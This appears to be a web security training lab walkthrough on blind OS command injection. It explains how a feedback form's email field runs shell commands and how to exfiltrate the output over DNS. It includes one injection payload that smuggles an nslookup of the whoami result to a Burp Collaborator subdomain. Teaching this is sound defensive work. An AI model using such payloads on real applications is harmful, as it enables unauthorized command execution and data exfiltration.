Lab: Blind OS command injection with out-of-band data exfiltration
This lab contains a blind OS command injection vulnerability in the feedback function.
The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to the public Burp Collaborator server (burpcollaborator.net). You will need to enter the name of the current user to complete the lab.
You must use the public Burp Collaborator server (burpcollaborator.net).
Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
Modify the email parameter, changing it to something like the following, but insert your Burp Collaborator subdomain where indicated: email=||nslookup+`whoami`.YOUR-SUBDOMAIN-HERE.burpcollaborator.net||
Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.
You should see some DNS interactions that were initiated by the application as the result of your payload. The output from your command should appear in the subdomain of the interaction, and you can view this within the Burp Collaborator client. The full domain name that was looked up is shown in the Description tab for the interaction.
To complete the lab, enter the name of the current user.
Want to track your progress and have a more personalized learning experience? (It's free!)